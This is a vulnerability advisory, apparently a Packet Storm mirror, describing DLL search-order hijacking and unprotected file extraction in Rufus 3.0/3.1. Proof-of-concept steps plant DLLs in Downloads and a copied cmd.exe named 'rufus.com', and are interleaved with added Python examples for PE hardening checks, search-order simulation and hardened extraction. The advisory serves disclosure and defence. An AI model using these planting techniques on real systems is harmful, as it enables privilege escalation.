Rufus 3.0 / 3.1 Privilege Escalation

Published 06 Aug 2018 | Reported by Stefan Kanthak | Type: packetstorm | Source: packetstormsecurity.com

Rufus 3.0 / 3.1 privilege escalation: multiple vulnerabilities, including DLL search order hijacking (DLL spoofing) and the extraction of unprotected files that are later executed, allow arbitrary code execution with administrative privileges.

Hi @ll,  
  
like their predecessors, the recently (2018-05-29 and 2018-06-19)  
published versions 3.0 and 3.1 of "Rufus" are riddled with bloody  
beginner's errors, which ALL allow arbitrary code execution WITH  
escalation of privilege, in MULTIPLE ways.  
  
JFTR: to support and ease further attacks, this crap is built  
without ASLR (its PE header lacks the "dynamic base" flag, so the  
image is always mapped at its fixed preferred address) and without  
stack cookies/canaries!  
<https://msdn.microsoft.com/en-us/library/bb430720.aspx>  
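A check for the claim above, added here as an example; it is not part of the advisory and not code from Rufus. The script parses the PE optional header's DllCharacteristics (ASLR, DEP, high-entropy VA, CFG) and the load config directory's SecurityCookie field. build_sample_pe32() is a constructed fixture so the checker runs without a real binary; run it with a path argument (e.g. a downloaded rufus-3.1.exe) to test the real thing. Caveat: a non-zero SecurityCookie is the marker the MSVC linker sets for /GS; GCC's -fstack-protector uses a different mechanism, so treat the cookie result as a hint and confirm by looking for __security_check_cookie or __stack_chk_fail references.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DYNAMIC_BASE = 0x0040      # /DYNAMICBASE: image may be relocated, i.e. ASLR applies
NX_COMPAT = 0x0100         # /NXCOMPAT: DEP
HIGH_ENTROPY_VA = 0x0020   # 64-bit high-entropy ASLR (PE32+ only)
GUARD_CF = 0x4000          # Control Flow Guard


def _rva_to_offset(sections, rva):
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return raw_ptr + (rva - vaddr)
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def check_pe(data):
    """Parse a PE image (bytes) and report its hardening flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe_off + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32plus = magic == 0x20B
    dllchar = struct.unpack_from("<H", data, opt + 0x46)[0]   # same offset in PE32 and PE32+
    dd_base = opt + (0x70 if pe32plus else 0x60)                # data directory table
    lc_rva, lc_size = struct.unpack_from("<II", data, dd_base + 10 * 8)  # entry 10: LOAD_CONFIG
    sect_off = opt + opt_size
    # IMAGE_SECTION_HEADER +8: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    raw = [struct.unpack_from("<IIII", data, sect_off + i * 40 + 8) for i in range(nsect)]
    sections = [(va, vs, ptr, size) for vs, va, size, ptr in raw]
    cookie = 0
    if lc_rva and lc_size >= (0x60 if pe32plus else 0x40):
        lc_off = _rva_to_offset(sections, lc_rva)
        # SecurityCookie: IMAGE_LOAD_CONFIG_DIRECTORY32 +0x3C, IMAGE_LOAD_CONFIG_DIRECTORY64 +0x58
        cookie = struct.unpack_from("<Q" if pe32plus else "<I", data,
                                    lc_off + (0x58 if pe32plus else 0x3C))[0]
    return {"pe32plus": pe32plus,
            "aslr": bool(dllchar & DYNAMIC_BASE),
            "dep": bool(dllchar & NX_COMPAT),
            "high_entropy_va": bool(dllchar & HIGH_ENTROPY_VA),
            "cfg": bool(dllchar & GUARD_CF),
            "gs_cookie": cookie != 0}


def check_file(path):
    with open(path, "rb") as f:
        return check_pe(f.read())


def build_sample_pe32(dll_characteristics, security_cookie):
    """Constructed minimal PE32 image with one section holding a load config
    directory: a test fixture so the checker can run without a real executable."""
    sect_rva, sect_raw, file_align = 0x1000, 0x400, 0x200
    load_config = bytearray(0x40)
    struct.pack_into("<I", load_config, 0, 0x40)                 # Size
    struct.pack_into("<I", load_config, 0x3C, security_cookie)   # SecurityCookie
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)         # Section/FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, sect_raw)           # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 0x46, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 10 * 8, sect_rva, len(load_config))
    section = bytearray(40)
    section[:6] = b".rdata"
    struct.pack_into("<IIII", section, 8, len(load_config), sect_rva, file_align, sect_raw)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(section)).ljust(sect_raw, b"\0")
    return headers + bytes(load_config).ljust(file_align, b"\0")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = check_file(target) if target else check_pe(build_sample_pe32(0, 0))
    for key, value in result.items():
        print("%-16s %s" % (key, value))
```

An image without DYNAMIC_BASE is mapped at its ImageBase on every run, which is exactly what makes the gadget addresses of a binary-planting payload predictable.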
  
  
Vulnerability #1  
================  
  
rufus-3.0.exe, rufus-3.0p.exe, rufus-3.1.exe and rufus-3.1p.exe are  
susceptible to DLL spoofing, also known as DLL search order hijacking:  
on a fully patched Windows 7, they load at least the following Windows  
system DLLs from their "application directory", typically the user's  
"Downloads" directory %USERPROFILE%\Downloads\, instead of from the  
Windows "system directory" %SystemRoot%\System32\, resulting in  
arbitrary code execution:  
  
DWMAPI.dll, UXTheme.dll, Version.dll, CryptSP.dll, NCrypt.dll,  
BCrypt.dll, RichEd20.dll, DSRole.dll, LogonCli.dll, DFSCli.dll,  
SAMCli.dll  
  
None of these is a KnownDLL, so the loader's search for them starts  
in the application directory.  
  
  
For this well-known and well-documented vulnerability see  
<https://cwe.mitre.org/data/definitions/426.html> and  
<https://cwe.mitre.org/data/definitions/427.html> plus  
<https://capec.mitre.org/data/definitions/471.html>.  
  
Additionally see Microsoft's developer guidance  
<https://technet.microsoft.com/en-us/library/2269637.aspx>,  
<https://msdn.microsoft.com/en-us/library/ff919712.aspx>,  
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> and  
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>  
to avoid this bloody beginner's error.  
  
Also see  
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>  
and  
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>  
plus  
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>  
for "prior art".  
  
And last but not least the 20+ year old  
<http://fy.chalmers.se/~appro/nt/nsaguide.pdf>  
  
  
Since the clueless developer specified "requireAdministrator" in  
the embedded application manifest, his crap can only be run with  
administrative privileges (after a UAC prompt), so any DLL planted  
in the user-writable "Downloads" directory executes with the elevated  
token, resulting in arbitrary code execution WITH escalation of  
privilege.  
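A model of the DLL search order this vulnerability relies on, added here as an example; it is not code from the advisory or from Rufus. It simulates what the loader does for LoadLibrary("DWMAPI.dll") in a process started from "Downloads": KnownDLLs are always bound from System32, every other bare name is searched application directory first (SafeDllSearchMode, the default since Windows XP SP2), and a process that called SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) skips the application directory for later LoadLibrary() calls. The KnownDLLs subset, directory listings and paths are constructed fixtures; the real loader additionally handles API sets, SxS/manifest redirection, .local files and LOAD_WITH_ALTERED_SEARCH_PATH, none of which is modelled.

```python
import ntpath

# Constructed fixture paths (not read from a live system)
SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"
DOWNLOADS = r"C:\Users\victim\Downloads"

# Subset of HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs (constructed;
# the real list varies by Windows version). Nothing from the advisory's list is in it.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "gdi32.dll",
              "advapi32.dll", "ole32.dll", "shell32.dll", "comdlg32.dll", "rpcrt4.dll"}

# The DLLs the advisory lists as loaded from the application directory
ADVISORY_DLLS = ["DWMAPI.dll", "UXTheme.dll", "Version.dll", "CryptSP.dll", "NCrypt.dll",
                 "BCrypt.dll", "RichEd20.dll", "DSRole.dll", "LogonCli.dll", "DFSCli.dll",
                 "SAMCli.dll"]


def resolve_dll(name, app_dir, cwd, path_dirs, files, known_dlls=KNOWN_DLLS,
                system32_only=False):
    """Return the path the loader binds for LoadLibrary(name), or None if not found.

    files: {directory: set of lowercase file names}, the simulated file system.
    Order is SafeDllSearchMode=1: application directory, System32, 16-bit System,
    Windows, current directory, then PATH. system32_only models a process that
    called SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)."""
    if ntpath.isabs(name):                   # fully qualified name: no search at all
        return name
    lname = name.lower()
    if lname in known_dlls:                  # KnownDLLs are mapped from the \KnownDlls
        return ntpath.join(SYSTEM32, name)   # section objects, i.e. from System32
    if system32_only:
        order = [SYSTEM32]
    else:
        order = [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd] + list(path_dirs)
    for directory in order:
        if lname in files.get(directory, set()):
            return ntpath.join(directory, name)
    return None


def hijackable(names, app_dir, cwd, path_dirs, files, **kwargs):
    """Names that would bind to a file an attacker planted in app_dir."""
    return [n for n in names
            if resolve_dll(n, app_dir, cwd, path_dirs, files, **kwargs)
            == ntpath.join(app_dir, n)]


def minefield_fixture():
    """Downloads holds a planted copy of every DLL from the advisory's list plus
    kernel32.dll; System32 holds the genuine ones. Constructed to mirror PoC #1."""
    planted = {n.lower() for n in ADVISORY_DLLS} | {"kernel32.dll"}
    return {DOWNLOADS: planted,
            SYSTEM32: {n.lower() for n in ADVISORY_DLLS} | set(KNOWN_DLLS)}


if __name__ == "__main__":
    fs = minefield_fixture()
    for n in ADVISORY_DLLS + ["kernel32.dll"]:
        print("%-14s -> %s" % (n, resolve_dll(n, DOWNLOADS, DOWNLOADS, [], fs)))
    print("still hijackable after LOAD_LIBRARY_SEARCH_SYSTEM32:",
          hijackable(ADVISORY_DLLS, DOWNLOADS, DOWNLOADS, [], fs, system32_only=True))
```

The planted kernel32.dll is ignored because it is a KnownDLL, while every name from the advisory's list binds to the copy in "Downloads"; the same model shows why SetDefaultDllDirectories() helps only for DLLs loaded after the call, not for those the loader resolves from the import table before the entry point runs.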
  
  
Demonstration/proof of concept #1:  
----------------------------------  
  
1. Follow the instructions from  
<https://skanthak.homepage.t-online.de/minesweeper.html>  
and build a testbed/minefield of 32-bit DLLs in your  
"Downloads" directory.  
  
2. Download <https://rufus.akeo.ie/downloads/rufus-3.0.exe> and  
<https://rufus.akeo.ie/downloads/rufus-3.0p.exe> and save them  
in your "Downloads" directory.  
  
3. Run rufus-3.0.exe and rufus-3.0p.exe: notice the message boxes  
displayed from multiple DLLs created in step 1!  
  
4. Download <https://rufus.akeo.ie/downloads/rufus-3.1.exe> and  
<https://rufus.akeo.ie/downloads/rufus-3.1p.exe> and save them  
in your "Downloads" directory.  
  
5. Run rufus-3.1.exe and rufus-3.1p.exe: notice the message boxes  
displayed from at least DSROLE.DLL created in step 1!  
  
  
JFTR: if you don't see a message box: open the event log and view  
the entries from source "Vulnerability and Exploit Detector".  
  
  
Fix:  
~~~~  
  
DUMP the executable installer, DUMP the portable crap, provide an  
.MSI, or a .CAB plus an .INF script.  
  
As a bare minimum until then: call SetDefaultDllDirectories() with  
LOAD_LIBRARY_SEARCH_SYSTEM32 (available on Windows 7 with KB2533623)  
before the first LoadLibrary(), and keep in mind that this does NOT  
cover the DLLs the loader resolves from the import table before the  
entry point runs; those have to be delay-loaded or dropped.  
  
Mitigations:  
~~~~~~~~~~~~  
  
See <https://skanthak.homepage.t-online.de/!execute.html>  
  
  
Vulnerability #2  
================  
  
Although running with administrative privileges, this crap extracts  
files UNPROTECTED [1] (with the DACL inherited from the target  
directory instead of an explicit security descriptor) into the  
"current working directory" for later execution (and into the user's  
%TEMP% directory for later use).  
  
For this well-known and well-documented vulnerability see  
<https://cwe.mitre.org/data/definitions/377.html> and  
<https://cwe.mitre.org/data/definitions/379.html> plus  
<https://capec.mitre.org/data/definitions/29.html>  
  
An unprivileged user/process running in the same user account [2]  
can modify the extracted files between their creation and use (a  
time-of-check/time-of-use race), or can even create bogus files under  
the expected names beforehand, which this crap then executes.  
Remember that it runs with administrative rights!  
  
  
Demonstration/proof of concept #2a:  
-----------------------------------  
  
1. Open a command prompt, then run the following command lines  
(the last two create a read-only copy of the command processor  
under the name this crap later executes):  
  
MKDIR "%SystemDrive%\CRAPWARE"  
CD /D "%SystemDrive%\CRAPWARE"  
COPY %COMSPEC% rufus.com  
ATTRIB.exe +R rufus.com  
  
2. Run the following command line:  
  
"%USERPROFILE%\Downloads\rufus-3.1.exe"  
  
Notice the string "rufus.com\n" pasted into the command prompt  
window (really: into whichever window happens to have keyboard  
focus) and the copy of the command processor started: the read-only  
file planted in step 1 was executed in place of the extracted one.  
  
3. Run the following command line:  
  
"%USERPROFILE%\Downloads\rufus-3.1p.exe"  
  
Again notice the string "rufus.com\n" pasted into the command  
prompt window, and the subsequent dialog box stating that  
another instance of this crap is already running.  
  
  
Demonstration/proof of concept #2b:  
-----------------------------------  
  
1. Run the following command lines in the still open command  
prompt:  
  
ATTRIB.exe -R rufus.com  
ERASE rufus.com  
SET NoDefaultCurrentDirectoryInExePath=*  
  
2. Run the command lines  
  
"%USERPROFILE%\Downloads\rufus-3.1.exe"  
"%USERPROFILE%\Downloads\rufus-3.1p.exe"  
  
3. Notice the error messages  
  
| "rufus.com" is not recognized as an internal or external command,  
| operable program or batch file.  
  
from the command prompt, and the complete failure of this crap: it  
relies on the command processor finding the bare name "rufus.com"  
in the current directory, which NoDefaultCurrentDirectoryInExePath  
just turned off.  
  
  
Demonstration/proof of concept #2c:  
-----------------------------------  
  
1. Add the NTFS ACE "(D;OIIO;WP;;;WD)" to the current working  
directory %SystemDrive%\CRAPWARE. In SDDL for file objects this  
reads: deny (D), object-inherit and inherit-only (OIIO: it applies  
to the files created below, including in subdirectories, but not  
to the directory itself), execute (WP is FILE_EXECUTE for files),  
for everyone (WD).  
  
2. Run the vulnerable applications: notice their complete failure,  
they neither display their window nor any error message!  
  
3. View the access rights of the file "rufus.com" created in the  
CWD: it carries the inherited deny-execute ACE, i.e. it was created  
without a security descriptor of its own.  
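The hardened counterpart of the extraction pattern described under Vulnerability #2 and in footnote [1], added here as an example; it is not code from the advisory or from Rufus. extract_insecure() is the pattern the advisory criticises (fixed name in the CWD, inherited permissions, bare name executed later); extract_hardened() and verify_before_run() use a private directory, an exclusive create, a handle/inode identity check and an absolute path; simulate() replays the three attacks from PoC #2 (pre-planted file, file swapped after creation, content overwritten in place). The helper payload, its hash and all directories are constructed. Assumptions: POSIX permission bits stand in for the explicit security descriptor a Windows installer must pass to CreateDirectory()/CreateFile() (Python's standard library cannot pass one, and on Windows the directory must also exclude the same user's unelevated token), and on Windows the open handle itself blocks the swap in scenario 2, which the code counts as detection.

```python
import hashlib
import os
import shutil
import tempfile

# Constructed stand-in for the helper an installer carries inside itself; the name is
# reused from the advisory only, this is not Rufus's rufus.com.
HELPER_NAME = "rufus.com"
HELPER_PAYLOAD = b"@echo off\r\necho helper running\r\n"
HELPER_SHA256 = hashlib.sha256(HELPER_PAYLOAD).hexdigest()
O_BINARY = getattr(os, "O_BINARY", 0)   # Windows-only flag, 0 elsewhere


def extract_insecure(cwd=None):
    """The advisory's pattern: fixed name in the CWD, permissions inherited from it,
    truncating open, and a bare name later resolved by cmd.exe/CreateProcess via the CWD."""
    with open(os.path.join(cwd or os.getcwd(), HELPER_NAME), "wb") as f:
        f.write(HELPER_PAYLOAD)   # reuses whatever file is already there
    return HELPER_NAME


def extract_hardened(directory=None):
    """Extract into a private directory; return (absolute path, our open fd).
    mkdtemp gives a fresh, unpredictably named directory (mode 0700 on POSIX). Assumption:
    on Windows the directory needs an explicit security descriptor (footnote [1]) that
    Python cannot pass; the exclusive create and the handle checks carry over as-is."""
    if directory is None:
        directory = tempfile.mkdtemp(prefix="helper-")
    path = os.path.join(directory, HELPER_NAME)
    # O_EXCL: a pre-planted file (or link) of that name fails here instead of being
    # silently truncated and executed later.
    fd = os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL | O_BINARY, 0o700)
    os.write(fd, HELPER_PAYLOAD)
    os.fsync(fd)
    return path, fd


def verify_before_run(path, fd):
    """Right before execution: the name we will run must still denote the file we wrote
    (same device/inode as our handle) and its content, read through our own handle, must
    be intact. This narrows the race window; only a DACL that keeps other principals out
    of the directory closes it."""
    h, n = os.fstat(fd), os.stat(path)
    if (h.st_dev, h.st_ino) != (n.st_dev, n.st_ino):
        raise RuntimeError("%s was replaced after extraction" % path)
    os.lseek(fd, 0, os.SEEK_SET)
    data, chunk = bytearray(), os.read(fd, 65536)
    while chunk:
        data += chunk
        chunk = os.read(fd, 65536)
    if hashlib.sha256(data).hexdigest() != HELPER_SHA256:
        raise RuntimeError("%s was modified after extraction" % path)
    return path   # absolute; never hand a bare name to CreateProcess or cmd.exe


def _attacker_writes(directory, name, content=b"evil"):
    """Unprivileged process in the same user account plants a file (constructed)."""
    os.makedirs(directory, exist_ok=True)
    with open(os.path.join(directory, name), "wb") as f:
        f.write(content)
    return os.path.join(directory, name)


def simulate():
    """The three attacks from the advisory's PoC #2, run against the hardened code."""
    results, root = {}, tempfile.mkdtemp(prefix="sim-")
    try:
        path, fd = extract_hardened()
        results["clean"] = verify_before_run(path, fd) == path
        os.close(fd)
        shutil.rmtree(os.path.dirname(path))
        planted = os.path.join(root, "planted")   # 1. bogus file pre-created
        _attacker_writes(planted, HELPER_NAME)
        try:
            extract_hardened(planted)
            results["preplanted_rejected"] = False
        except FileExistsError:
            results["preplanted_rejected"] = True
        swap = os.path.join(root, "swap")         # 2. file swapped between creation and use
        os.mkdir(swap)
        path, fd = extract_hardened(swap)
        try:
            os.replace(_attacker_writes(swap, "evil.tmp"), path)  # Windows: handle blocks it
            verify_before_run(path, fd)
            results["swap_detected"] = False
        except (RuntimeError, PermissionError):
            results["swap_detected"] = True
        os.close(fd)
        tamper = os.path.join(root, "tamper")     # 3. content overwritten in place
        os.mkdir(tamper)
        path, fd = extract_hardened(tamper)
        with open(path, "r+b") as f:
            f.write(b"evil")
        try:
            verify_before_run(path, fd)
            results["tamper_detected"] = False
        except RuntimeError:
            results["tamper_detected"] = True
        os.close(fd)
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return results
```

The checks in verify_before_run() are defence in depth: they catch the swap and the overwrite after the fact, but the window between the check and CreateProcess() remains open, which is why the directory's DACL, not the verification, is the actual fix.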
  
  
stay tuned, and FAR AWAY from such vulnerable and defective crap  
Stefan Kanthak  
  
  
[1] on Windows, every developer past absolute beginner uses the  
fourth argument of CreateFile()  
<https://msdn.microsoft.com/en-us/library/aa363858.aspx>  
or the second argument of CreateDirectory()  
<https://msdn.microsoft.com/en-us/library/aa363855.aspx>  
to specify a "security descriptor" with the desired and needed  
access rights, at least and especially when running privileged.  
  
[2] the ONE and ONLY user account created during Windows setup is an  
administrator account, and it is used by the vast majority of  
Windows users for their everyday work: according to Microsoft's  
own telemetry data, as published in their "Security Intelligence  
Reports" <https://www.microsoft.com/security/sir/default.aspx>  
about 1/2 to 3/4 of all (some 600 million) Windows installations  
report only one active user account.  
  
  
